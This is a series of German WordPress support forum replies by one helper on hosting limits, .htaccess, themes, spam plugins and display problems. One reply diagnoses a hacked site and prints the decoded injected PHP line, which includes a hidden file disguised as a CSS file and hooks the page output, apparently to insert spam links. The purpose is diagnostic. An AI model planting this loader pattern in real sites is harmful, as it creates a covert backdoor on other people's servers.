Beiträge von Marcus[IS]

    Hi,

    ja, das habe ich mir schon fast gedacht.

    Da hilft nur mal dem Support von 1&1 auf die Füße zu steigen.

    Soweit ich das zurückblicken kann, haben die klammheimlich mit der Einführung des neuen Dual Pakets den Momory angeblich hochgesetzt.

    Die bittere Realität sieht aber leider so aus, dass wir (Altbestandskunden) gar nicht mehr Memory zur Verfügung haben, auch wenn es angezeigt wird.

    Ich hatte vor kurzem erst einen Call Agent von 1&1 am Telefon und habe ihm das mal an den Kopf geworfen.

    Na ja, danach war das Gespräch auch recht schnell beendet, als ich sagte das ich meinen Webspace bei 1&1 bald in den Wind schieße und mir jetzt zum selben Preis einen Rootserver besorgt habe.:)

    Mojn,

    Zitat

    Kann mir den keiner der 33, die das gelesen haben einen Tip geben?

    Also nach Drei Stunden bereits pushen und eine Lösung erwarten sehen wir hier aber nicht so gerne. ;)

    Ich denke mal, dass keiner der Leser weiß, woran es liegt und auch ich müsste da raten.

    Nun mal zu meiner Vermutung;
    Eventuell liegt es am vom Provider eingestelltem php memory limit.
    Da müsstest du mal prüfen, wie hoch das Limit eingestellt ist.

    Falls du nicht weißt wie, mache folgendes;
    Erstelle mit einem Texteditor eine info.php Datei mit folgendem Inhalt;

    PHP
    <?PHP
    phpinfo ();
    ?>


    Dies in den Wordpress-Ordner packen und direkt aufrufen.
    (zum Beispiel http://deine.domain/blog/info.php)
    So bekommst du die Serverumgebung angezeigt, die derzeit bei dir läuft.
    Da musst du dann mal nach dem Eintrag php memory limit suchen.

    Ist dieser bei 32M, am besten mal bei deinem Provider nachfragen, ob eine Erhöhung drin ist.

    32M reichen zwar im Regelfall aus, allerdings gibt es auch ein paar Ausnahmen, wo es nicht mehr ausreichend ist.
    Sollte zum Beispiel ein 64Bit System auf dem Server laufen, reichen 32M nicht aus, da ist die minimal Grenze besser bei 64M anzusetzen, da WP sich unter 64Bit Serverumgebung ein wenig anders verhält, was den Speicherbedarf für Plugins, etc. angeht.

    Hi,

    Zitat

    In meinen Uploads Ordner hat sich eine .htaccess Datei geschlichen.

    Ui, gut das du das gemerkt hast, sonst hätten wir lange Überlegen müssen, wieso und weshalb.
    Das eine .htaccess dazwischenhaut wäre ich nicht drauf gekommen, weil in diesem Ordner normalerweise keine ist.;)
    Also wenn du die Datei nicht in den Ordner gepackt hast, könntest du ja mal beim Provider anfragen, ob die eine Erklärung dafür haben, wo die Datei plötzlich herkommt.
    WordPress hat die .htaccess Datei mit Sicherheit nicht angelegt, da wir als User das bisher immer selber machen mussten.

    Mojn,

    Zitat

    ... für was ist so eine .htaccess Datei gut?

    .htaccess <-- einfach draufklicken.;)

    Zitat

    Ich habe jetzt einfach mit JS in der Index.html Datei eine Weiterleitung zu /Wordpress gemacht, ist das auch gut?

    Nicht wirklich.
    Ich weiß zwar nicht, wie das SEO Technisch für die Indizierungen bei Suchmaschinen wie Google aussieht, aber wenn Besucher aus irgendwelchen Gründen Javaskript im Browser deaktiviert haben, funktioniert die Weiterleitung für diese Besucher nicht.

    Hi,

    Eine .htaccess ist von Haus aus nicht in WordPress enthalten.
    Die muss jeder User für sich selber anlegen.

    Um dein Problem folgendermaßen zu lösen könntest du jetzt folgendes machen;

    Eine .htaccess selber mit einem Editor erstellen (Am besten mit Notepad++, oder einem adäquatem Ersatz) und folgendes Eintragen;

    Das wird benötigt, um die Permalinkfunktionen nutzen zu können. (Sieht hinterher auch schöner aus, als die Standardlinks ;))

    Für den Schritt mit dem Domainaufruf haben wir einen recht guten Artikel in der FAQ, der die ganze Sache beschreibt.
    http://faq.wordpress-deutschland.org/wordpress-trot…chnis-aufrufen/

    Mojn,

    Zitat

    Vielleicht ist hier jemand so nett und erklärt mir, wo ich was im Wordpress-Editor löschen muss um die Anzeige im kompletten Blog nicht mehr zu sehen?

    Was die Kommentarfunktion in der Ausgabe des Frontend angeht, müsstest du mal in die loop.php des Themes nachschauen.

    Dort ist dies an 3 Stellen enthalten;
    Zeile 60, 81 und 122

    PHP
    <span class="comments-link"><?php comments_popup_link( __( 'Leave a comment', 'brunelleschi' ), __( '1 Comment', 'brunelleschi' ), __( '% Comments', 'brunelleschi' ) ); ?></span>

    Wenn du diese Drei Zeilen rausnimmst, sollte die Kommentarfunktion entfernt sein.

    Halte dir aber zur Sicherheit die Originaldatei in der Hinterhand, falls du dich doch mal entscheidest Kommentare zuzulassen.

    Mojn,

    ja so wie es aussieht ist die Passwortlänge bei Wordpress in der Tat nur auf 20 Zeichen beschränkt.

    Um das zu ändern müsste man in den Core Dateien rumfummeln.
    Allerdings weiß ich jetzt so auf Anhieb nicht wo genau.

    Doch davon ist aber eher abzuraten, da bei einem Update diese Änderung wieder verschwindet, wenn die geänderte Datei durch die neue Datei überschrieben werden würde.

    Ich bin mir jetzt nicht ganz sicher, aber ich glaube, diese Beschränkung hat auch etwas mit der UTF-8 Zeichencodierung zu tun, die unter WordPress zum Einsatz kommt.
    Aber das ist jetzt nur eine Vermutung meinerseits.

    Aber 20 Zeichen wollen erst mal geknackt werden, wenn es jemand drauf anlegt, auch wenn es keinen 100%tigen Schutz gibt. ;)

    Hi,

    Du schreibst, dass du vor ein paar Tagen schon mal eine Installation ohne Probleme durchgeführt hast.
    Also wenn es auch WordPress war, könnte ich mir vorstellen das eine, oder mehrere Dateien eventuell beschädigt sind und die Installation deshalb hängt.

    Das weiße Seite Problem kann man meines Erachten vorerst einmal ausklammern, da ja etwas angezeigt wird.

    Hast du mal versucht die Daten nochmals auf den FTP zu überspielen und dann die Installation durchzuführen?

    Mojn,

    bei der Latte von Problemen ist da jetzt die Vermutung, dass irgendwie Dateien deiner Installation defekt sind.

    php memory Fehler tauchen in der Tat nur dort auf, wenn man zu viele Plugins verwendet und der Provider das Limit für php memory zu niedrig angesetzt hat.

    Doch du schreibst ja, dass du einige Plugins gelöscht hast und das Problem nach wie vor besteht und du noch nicht mal mehr das richtige Nutzerlevel hast.

    Du könntest mal versuchen "alle" Plugins zu deaktivieren indem du auf dem FTP den Pluginordner umbenennst, so dass WordPress "sämtliche" Plugins automatisch deaktiviert.

    Solltest du dann immer noch nicht reinkommen, befürchte ich, dass mehr defekt ist und u. Umständen die Datenbank auch einen Schaden hat.

    Eventuell hilf dann das Einspielen eines Backup, im schlimsten Fall sogar nur eine Neuinstallation.

    Mojn,

    also auf deinem Sceenshoot ist nix zu erkennen, da der ja ziemlich winzig ist.;)

    Du schreibst, dass du bei 1&1 bist.
    Daran liegt es meines Erachten allerdings nicht, da du sonst auch die Probleme unter Firefox haben müsstest.

    Es sei denn, du nutzt kein PHP5.
    Das musste man bei 1&1 vor nicht all zu langer Zeit noch mittels eigener .htaccess ansteuern.
    Oder ein Plugin schießt dazwischen, mit dem Chrome nicht klar kommt.

    Mojn,

    ja also von sich aus sollte WordPress nicht hingehen und Seiten mal eben in den Papierkorb schieben.

    Welche WordPress Version nutzt du denn?

    Es könnte eventuell sein, dass ein Plugin dafür verantwortlich ist.
    Aber das ist jetzt echt nur eine Vermutung.

    Mojn,

    Zitat

    Wordpressversion 2.7.1 auf V-Server gehostet.

    Ich denke, da haben wir die Antwort.

    Deine WordPress Version ist nicht aktuell und vermutlich hat der Skripter eine Sicherheitslücke ausgenutzt.

    Mittlerweile sind wir bei Version 3.1.3 und inzwischen wurden nicht nur Grundlegende Funktionsänderungen gemacht, sondern auch teilweise recht pikante Sicherheitslücken geschlossen.

    Die von dir angegebene Zeile mit dem eval Code sagt im Klartext dieses hier aus;

    Code
    if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/var/www/web20/html/wp-includes/js/tinymce/themes/advanced/skins/default/img/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

    Ich kenne mich ein wenig mit Artisteer generierten Themes aus, da ich selber Themes verwende, die mit diesem Programm erstellt wurden.
    Doch der Quelltext in deiner footer.php sieht total anders aus, als der von mir, was aber nichts heißen will, da bei deinem Theme eine andere Version verwendet wurde, als bei mir.

    Was mich allerdings stutzig macht, sind diese Sachen am Ende deiner footer.php;

    PHP
    <?php
    ob_start();
    wp_footer();
    $content = ob_get_clean();
    if (strlen($content)) echo '<div>' . $content . '</div>';
    ?>

    Ich weiß nicht wofür das gut sein soll, wenn ich ehrlich bin.

    Die footer.php sieht bei mir so aus;

    PHP
    <?php  
    $content = ob_get_clean();
    echo art_parse_template(art_page_template(), art_page_variables(array('content'=> $content)));
    ?>
        <div id="wp-footer">
                <?php wp_footer(); ?>
                <!-- <?php printf(__('%d queries. %s seconds.', THEME_NS), get_num_queries(), timer_stop(0, 3)); ?> -->
        </div>
    </body>
    </html>

    Also wie du sieht ziemlich anders, was aber auch nicht aussagekräftig ist, da das Theme ja noch von Hand nachträglich umgebaut worden sein könnte.

    Nachtrag;
    Es kann überigends auch sein, dass sich der Schadcode noch zusätzlich in deiner Datenbank befindet.

    Es gibt diverse Exploit Scanner, mit denen du die Datenbank durchsuchen kannst.
    Gibt diverse Forenbeiträge diesbezüglich.
    http://forum.wordpress-deutschland.org/search.php?searchid=2123787

    Mojn,

    Es wäre auf ganz hilfreich, wenn du uns noch ein paar Infos geben kannst;

    Welche WP Version?
    Eigener Server, V-Server, oder Webspace bei einem Provider?
    Welche Plugins kommen zum Einsatz?

    Ein Blick auf diese Seite würde ich empfehlen.
    http://toscho.de/2009/website-gehackt/

    Des weiteren kannst du mal in deinen php Dateien des Themes nachschauen, ob dort eventuell Verschlüsselter Code enthalten ist, der nicht dahingehört.
    Also der Stelle nach zu Urteilen wo die Einträge auftauchen, vermute ich mal dass es eventuell in der footer.php zu finden wäre.

    Solcher Code macht sich durch eine Anreihung von Zahlen und Buchstabenketten bemerkbar, wie in diesem Beispiel;

    Code
    SXN0IGRvY2ggbnVyIGVpbiBCZWlzcGllbA==

    Edit;

    Zitat

    Die Links tauchen komischer Weise nur auf den Unterseiten auf! Event. kann ja jemand helfen

    Nicht ganz, die Links sind auch schon beim Ersten Aufruf der Website im Quelltext vorhanden. ;)

    Hallöchen,

    jetzt weiß ich auch was du meinst.

    Also warum die Zeichen in der Dicke unterschiedlich dargestellt werden, kann ich leider nicht erklären, vermute aber mal, dass es generell mit utf-8 zusammenhängt, da ich bei Google auf diverse Einträge gestossen bin, die alle das selbe Problem mit H1 Titeln beschrieben haben.

    Aber ich bin ja recht experimentierfreudig und gehe zum finden einer Lösung auch schon mal recht ungewöhnliche Wege. ;)

    Ich habe tatsächlich auf einer Chinesischen Internetseite, die WordPress einsetzt etwas in der CSS gefunden, das so verrückt ist, aber klappt.

    Du müsstest mal schauen, ob du deine style.css so umbauen kannst.
    Diese Einträge befinden sich ab Zeile 312.

    Code
    .hentry .title h1 a, .hentry .title h2 a {
        display: block;
        [COLOR=Red]font-family: 黑体;[/COLOR]
        padding: 10px 0;
    
    
    
    
    }

    Ich habe zwar noch nie gesehen, dass in einer CSS Chinesische Schriftzeichen zum Einsatz kommen, aber unter Firebug hat es geklappt und alle Zeichen wurden in der gleichen Dicke dargestellt.

    Es mutet zwar jetzt an, dass hier bold (fett) zum Einsatz kommt, aber vermutlich ist das ja auch ein Font, der vornehmlich in China eingesetzt wird?

    Aber eventuell hätte ja noch jemand eine andere Lösung parat, weil das Problem ist wirklich ungewöhnlich.:lol:

    Hallo [您好],

    Ich kann zwar kein Chinesisch und die Wahrscheinlichkeit, dass hier im Forum jemand anderes der Chinesischen Sprache in Wort und Schrift mächtig ist, schätze ich auch eher als gering ein, wäre trotz alle dem ein Link zu deinem Blog hilfreich.;)

    So können wir uns das Problem mal anschauen.
    Es kann ja sein, dass es eventuell ja auch nur eine Einstellung im Browser ist, oder etwas am Theme geändert werden müsste?

    Normalerweise sollte WordPress durch UTF-8 keine Probleme mit der Darstellung von Asiatischen Schriftzeichen haben.

    Mojn,

    Ja die Spambots sind ziemlich lästig.

    Ich würde, falls du es noch nicht nutzt, das Plugin Antispam Bee empfehlen.
    http://wordpress.org/extend/plugins/antispam-bee/

    Früher hatte ich das WordPress eigene Akismet genutzt, doch die Spams wurden danach immer schlimmer, anstatt besser.

    Der Einsatz von Akismet ist auch nicht mehr zu empfehlen, da sich inzwischen herausgestellt hat, dass dieses Plugin alle möglichen Daten der Kommentarschreiber sammelt und an einen Server in die USA schickt, was nach derzeitiger Rechtslage zum Datenschutz in Deutschland nicht zulässig ist.
    http://blog.wordpress-deutschland.org/2011/03/01/ver…nsequenzen.html
    http://blog.wordpress-deutschland.org/2011/04/20/aki…-notwendig.html

    Viele Grüße,
    Marcus